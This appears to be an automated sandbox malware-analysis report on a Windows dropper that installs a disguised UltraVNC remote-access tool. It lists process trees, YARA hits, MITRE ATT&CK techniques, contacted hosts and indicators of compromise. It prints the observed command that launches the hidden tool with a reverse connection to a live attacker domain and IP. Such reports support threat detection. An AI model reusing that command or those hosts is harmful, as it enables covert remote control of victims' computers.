Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0D7B90 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetLastError,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,18_2_00007FF6DC0D7B90
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: 0_2_0040244E AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0040244E
Source: WPSela.LSZr7V.0.dr | Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitrestartvncdesktop.cpp : ~vncDesktop
Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: vncmenu.cpp : ########### Shell_TrayWnd found %i
Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: Location: // basicwinhttp.dllWinHttpGetIEProxyConfigForCurrentUser;http=https==UltraVNC.ini -settingshelperWinsta0\DefaultShell_TrayWndpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-57B0D07B8C7C}{34F673E0-878F-11D5-B98A-00B0D07B8C7C}0~
Source: sync_browser.exe, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr | Binary or memory string: Program Manager
Source: sync_browser.exe, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr | Binary or memory string: Shell_TrayWnd
Source: sync_browser.exe, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr | Binary or memory string: Progman
Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: WTSUnRegisterSessionNotificationvncmenu.cpp : ########### Shell_TrayWnd found %i
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00402187
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: 0_2_00401815 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401815
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC129EF0 GetProcessWindowStation,GetUserObjectInformationA,GetLastError,SetLastError,RevertToSelf,GetUserNameA,GetLastError,GetLastError,18_2_00007FF6DC129EF0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC17DF80 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,18_2_00007FF6DC17DF80
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: 0_2_00405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405721

Stealing of Sensitive Information

Source: Yara match | File source: 23.2.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.0.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000017.00000002.2288199566.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2108953574.000000000266B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.2276683914.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.2195868188.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2108665384.000000000284F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 7q551ugrWe.exe PID: 6984, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sync_browser.exe PID: 7736, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sync_browser.exe PID: 6084, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V, type: DROPPED
Source: Yara match | File source: C:\Windows\Tasks\WPSela.LSZr7V, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 23.2.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.0.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000017.00000002.2288199566.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2108953574.000000000266B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.2276683914.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.2195868188.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2108665384.000000000284F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 7q551ugrWe.exe PID: 6984, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sync_browser.exe PID: 7736, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sync_browser.exe PID: 6084, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V, type: DROPPED
Source: Yara match | File source: C:\Windows\Tasks\WPSela.LSZr7V, type: DROPPED
Source: sync_browser.exe, 00000012.00000003.2401438900.000000000223A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: RFB 003.008
Source: sync_browser.exe, 00000012.00000002.4547061075.0000000002230000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: RFB 003.008
MITRE ATT&CK Matrix

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: 1 Windows Management Instrumentation; 2 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; 1 Service Execution; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: 1 DLL Side-Loading; 1 Valid Accounts; 11 Windows Service; 1 Scheduled Task/Job; 1 Bootkit; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 1 Valid Accounts; 11 Access Token Manipulation; 11 Windows Service; 22 Process Injection; 1 Scheduled Task/Job; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading; 231 Masquerading; 1 Valid Accounts; 1 Virtualization/Sandbox Evasion; 11 Access Token Manipulation; 22 Process Injection; 1 Bootkit
Credential Access: 121 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 4 File and Directory Discovery; 26 System Information Discovery; 31 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; System Network Connections Discovery
Lateral Movement: 1 Remote Desktop Protocol; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: 1 Archive Collected Data; 1 Screen Capture; 121 Input Capture; 3 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: 1 Ingress Tool Transfer; 12 Encrypted Channel; 1 Remote Access Software; 1 Non-Application Layer Protocol; 2 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph ID: 1579876 | Sample: 7q551ugrWe.exe | Startdate: 23/12/2024 | Architecture: WINDOWS | Score: 92
Contacted hosts: tbdcic.info; x1.i.lencr.org; bg.microsoft.map.fastly.net
Signatures: Icon mismatch, binary includes an icon from a different legit application in order to fool users; Multi AV Scanner detection for submitted file; Yara detected UltraVNC Hacktool; 4 other signatures
• 7q551ugrWe.exe started
  Dropped: C:\Users\user\AppData\Local\...\WPSela.LSZr7V (PE32+); C:\Users\user\AppData\Local\...\Nfe70s.UFVVkM (PE32+)
  Signature: Contains functionality to register a low level keyboard hook
  • cmd.exe (first instance) started
    Dropped: C:\Windows\Tasks\sync_browser.exe (PE32+); C:\Windows\Tasks\conhost.exe (PE32+)
    Signature: Drops executables to the windows directory (C:\Windows) and starts them
    Started: sync_browser.exe; Acrobat.exe; taskkill.exe; 11 other processes
    • sync_browser.exe: tbdcic.info 194.190.152.201, 443, 49732, 49733, RSHB-ASRU, Russian Federation
      Signature: Contains VNC / remote desktop functionality (version string found)
    • Acrobat.exe started AcroCEF.exe, which started AcroCEF.exe
  • cmd.exe (second instance) started
    Dropped: C:\Windows\Tasks\WPSela.LSZr7V (PE32+); C:\Windows\Tasks\Nfe70s.UFVVkM (PE32+)
    Started: conhost.exe
  • cmd.exe (third instance) started
    Started: conhost.exe

Source | Detection | Scanner | Label | Link
7q551ugrWe.exe | 24% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkM | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V | 0% | ReversingLabs | |
C:\Windows\Tasks\Nfe70s.UFVVkM | 0% | ReversingLabs | |
C:\Windows\Tasks\WPSela.LSZr7V | 0% | ReversingLabs | |
C:\Windows\Tasks\conhost.exe | 0% | ReversingLabs | |
C:\Windows\Tasks\sync_browser.exe | 0% | ReversingLabs | |

No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tbdcic.info | 194.190.152.201 | true | true | | unknown
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
x1.i.lencr.org | unknown | unknown | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.uvnc.com | 7q551ugrWe.exe, 00000000.00000003.2108953574.000000000266B000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000284F000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000000.2195868188.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288199566.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | false | | high
http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.13.dr | false | | high
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1 | 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | false | | high
http://www.uvnc.comopenhttp://forum.uvnc.comnet | 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | false | | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | 7q551ugrWe.exe, 00000000.00000003.2108953574.0000000002679000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000285D000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | false | | high
http://java.sun.com/products/plugin/index.html#download | 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | false | | high
http://forum.uvnc.com | 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | false | | unknown
http://ocsp.thawte.com0 | 7q551ugrWe.exe, 00000000.00000003.2108953574.0000000002679000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000285D000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
194.190.152.201 | tbdcic.info | Russian Federation | 41615 | RSHB-ASRU | true
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1579876
                                                Start date and time:2024-12-23 13:28:08 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 30s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:28
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Sample name:7q551ugrWe.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4.exe
                                                Detection:MAL
                                                Classification:mal92.troj.spyw.evad.winEXE@50/46@2/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.218.208.137, 52.22.41.97, 3.219.243.226, 3.233.129.217, 52.6.155.20, 162.159.61.3, 172.64.41.3, 23.195.39.65, 199.232.210.172, 2.19.198.27, 23.32.239.56, 13.107.246.63, 23.218.208.109, 54.224.241.105, 23.56.162.204, 172.202.163.200
                                                • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
• Not all processes were analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: 7q551ugrWe.exe
Time | Type | Description
07:29:21 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
07:29:52 | API Interceptor | 11516852x Sleep call for process: sync_browser.exe modified
07:30:05 | API Interceptor | 58x Sleep call for process: timeout.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
194.190.152.201 | T8xrZb7nBL.exe | malicious | UltraVNC
 | Olz7TmvkEW.exe | malicious | UltraVNC
 | mSRW5AfJpC.exe | malicious | UltraVNC
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bg.microsoft.map.fastly.net | T8xrZb7nBL.exe | malicious | UltraVNC | 199.232.210.172
 | Olz7TmvkEW.exe | malicious | UltraVNC | 199.232.210.172
 | mSRW5AfJpC.exe | malicious | UltraVNC | 199.232.214.172
 | eszstwQPwq.ps1 | malicious | LockBit ransomware, Metasploit | 199.232.210.172
 | 0vM02qWRT9.ps1 | malicious | LockBit ransomware, Metasploit | 199.232.210.172
 | #U5b89#U88c5#U52a9#U624b_2.0.8.exe | malicious | Unknown | 199.232.214.172
 | fiFdIrd.txt.js | malicious | Unknown | 199.232.210.172
 | 5XXofntDiN.exe | malicious | LummaC | 199.232.210.172
 | p3a0oZ4U7X.exe | malicious | Unknown | 199.232.214.172
 | lKin1m7Pf2.lnk | malicious | Unknown | 199.232.210.172
tbdcic.info | T8xrZb7nBL.exe | malicious | UltraVNC | 194.190.152.201
 | Olz7TmvkEW.exe | malicious | UltraVNC | 194.190.152.201
 | mSRW5AfJpC.exe | malicious | UltraVNC | 194.190.152.201
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RSHB-ASRU | T8xrZb7nBL.exe | malicious | UltraVNC | 194.190.152.201
 | Olz7TmvkEW.exe | malicious | UltraVNC | 194.190.152.201
 | mSRW5AfJpC.exe | malicious | UltraVNC | 194.190.152.201
 | Scan_Zakaz_1416-02-24_13-02-2024.jpg.lnk | malicious | Reverse SSH | 194.190.152.129
 | Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnk | malicious | Reverse SSH | 194.190.152.129
 | document.jpg.lnk | malicious | Reverse SSH | 194.190.152.129
 | tiago.exe | malicious | Reverse SSH | 194.190.152.129
 | 0EZ9Ho3Ruc.exe | malicious | RedLine | 194.190.152.148
 | Paralysis Hack.exe | malicious | zgRAT | 194.190.153.137
 | file.exe | malicious | 000Stealer | 194.190.152.193
                                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkM | T8xrZb7nBL.exe | malicious | UltraVNC
 | Olz7TmvkEW.exe | malicious | UltraVNC
 | mSRW5AfJpC.exe | malicious | UltraVNC
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V | T8xrZb7nBL.exe | malicious | UltraVNC
 | Olz7TmvkEW.exe | malicious | UltraVNC
 | mSRW5AfJpC.exe | malicious | UltraVNC
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:modified
                                                                  Size (bytes):508
                                                                  Entropy (8bit):5.047195090775108
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                  MD5:70321A46A77A3C2465E2F031754B3E06
                                                                  SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                  SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                  SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                  Malicious:false
